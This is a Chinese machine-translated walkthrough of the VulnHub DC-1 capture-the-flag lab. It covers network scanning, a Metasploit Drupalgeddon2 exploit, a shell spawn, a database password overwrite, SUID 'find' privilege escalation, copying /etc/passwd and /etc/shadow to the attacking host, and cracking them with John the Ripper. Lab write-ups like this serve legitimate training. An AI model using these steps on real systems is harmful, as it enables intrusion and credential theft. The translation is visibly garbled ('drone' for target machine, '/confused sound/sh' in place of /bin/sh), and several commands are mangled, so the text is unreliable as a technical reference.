vulhub怎么使用,vulhub通关教程
Vulnhub 1-DC简介:1前言为了更好的了解Kali渗透测试,我最近接触了Volunhub平台,一个免费提供漏洞目标飞行器进行渗透测试的平台。
准备DC:1无人机下载。
Kali系统(本实验使用Kali-Linux-2020-3-Live-AMD64-ISO)
目标机导入,VirtualBox和VMware都可以。
准备虚拟机,将目标无人机DC:1和攻击机kali系统设置在同一个局域网内。本实验采用(NAT模式)
目的验证DC 1号在实验中的引入。
DC-1是一个专门建造的易受攻击的实验室,目的是获得渗透测试领域的经验。它的难度取决于你的技能知识和学习能力。要成功完成这项挑战,您需要具备Linux技能,熟悉Linux命令行,并具备基本渗透测试工具的经验。
总共有五个标志,但最终目的是找到并读取根目录的主目录中的标志。您甚至不需要成为root用户来执行此操作,但是,您将需要root权限。
实验性局域网扫描:sudo arp-scan -l
不知道目标机的IP,先用arp扫描局域网。
已知扫描目标无人机DC:1的IP地址为192.168.11.142。
扫描端口以收集信息:sudo nmap 192.168.11.142
已知扫描DC:1的TCP端口22、80、111是开放的,从端口推断目标机器已经启动了web服务。
得出结论,使用Drupal搭建网站,搜索Drupal相关信息后进行下一步工作。
扫描漏洞并准备攻击。使用msf工具
漏洞搜索:搜索drupal
Drupal根据无人机的网站进行搜索。
漏洞利用:use exploit/UNIX/web app/Drupal _ drupalgeddon 2
可以依次进行攻击,最后成功攻击这个漏洞。
请参见参数选项显示选项
设置攻击域名,开始攻击。
设置rhosts 192.168.11.142漏洞
提示Meterpreter session 1打开,表示攻击成功,输入目标飞机。
进入目标无人机,进入shell,然后进入shell环境,查看文件,输入ls,找到目标文件flag1.txt
检查flag1.txt
干得好。您可能需要一个配置文件。根据这个提示,目标flag2应该在一个配置文件中。根据启动的web服务,下一个目标应该是web服务的配置文件。
查找www配置文件,一般查看配置文件需要权限。此时通过python弹起一个终端,获得普通用户权限:
python-c import pty;Pty.spawn(/困惑的声音/sh )
输入www配置文件。
成功找到标志2:
暴力攻击和字典攻击并不是获得访问权限的唯一方法(您将需要访问权限)。这些代金券可以用来做什么?
这里提示我们需要权限,可能是因为我们想获得root权限或者访问drupal网站。
尝试破解密码,登录drupal网站。
8.1根据数据库用户dbuser和flag2文件中的密码R0ck3t登录数据库。
8.2查看数据库内容:显示数据库,
进入数据库并查看表单内容:使用drupaldb,显示表格。
没有获得明显有用的内容。
8.3尝试查询数据库,查询所有用户:select * from user
8.4尝试更改用户admin的密码。
更新数据库中的源密码,并加载加密脚本以生成密码的哈希值。
PHP/var/www/scripts/password-hash . sh密码
加密脚本位于网站根目录下的scripts下,生成密码哈希值替换。
替换:更新drupaldb.users集pass
= $ S $DgNSiYzRbilwq18C5。d/pnvrvdokncm 5 w xbg 7 aidqwfnkdi 0 tjcl 其中name=" admin
登录网站查找内容(管理员密码)
找到目标标志3并查看内容。
特殊的PERMS将有助于找到密码-但你将需要命令执行,以确定如何获得隐藏的内容。
系统会提示我们获取权限以查看阴影中的内容。
获取root权限。
SUID是一种特殊的文件属性,它允许用户执行的文件以文件所有者的身份运行。查找SUID文件:
find/-user root-perm-4000-print 2/dev/null
找到“查找”命令。
通过find命令获得root权限:mkdir abc
ABC-exec /混乱的声音/嘘;
成功获得root权限,并成功提升权限。
检查/etc/shadow文件。
发现目标标志4
检查/etc/passwd文件。
破解flag4密码
连接本地服务器,发回/etc/passwd和/etc/shadow文件进行破解。
连接到本地服务器并构建ssh服务。
编辑ssh配置文件并启动服务。
找到# permitrootlogin禁止密码,删除之前的#,并将“禁止密码”更改为“是”。
找到PasswordAuthentication行,并删除它前面的#注释。如果后面说不是,那就需要修改成是。
打开ssh服务:sudo服务ssh启动
归还文件并破解它。
scp/etc/passwd kali @ 192 . 168 . 11 . 143:/home/kali/Desktop
scp/etc/shadow kali @ 192 . 168 . 11 . 143:/home/kali/桌面
使用unshadow命令将文件合并为一个文件。
先创建文件dopass,进入桌面,打开终端,因为返回的文件在桌面上。合并文件
sudo unshadow passwd shadow dopass
破解,用卡莉自己的约翰破解。有一个简单的方法来使用其他解密。
苏多约翰多帕斯
获取flag4的密码是橙色的
登录无人机DC:1
ssh flag4@192.168.11.142
查找并查看文件。
系统会提示我们以同样的方式获取root权限。
获取root权限。
根据提示,转到/root查看最终目标。
找到终极目标,查查内容,发现是作者的鼓励。这意味着我们成功实现了穿透目标无人机的目标。总之,通过攻击目标无人机DC:1,我更熟悉卡利的工具和命令的使用。
在渗透的过程中,不断学习,积累经验,从而得到成长。最后,我们成功实现了五个目标。
学习的过程就是不断的探索,所以继续加油吧!
并且感谢大家推荐的文章,Linux提电各种姿势总结。
Kali中msf的简单开发
如何破解linux用户账号密码一
Kali打开ssh服务。
使用开膛手约翰破解密码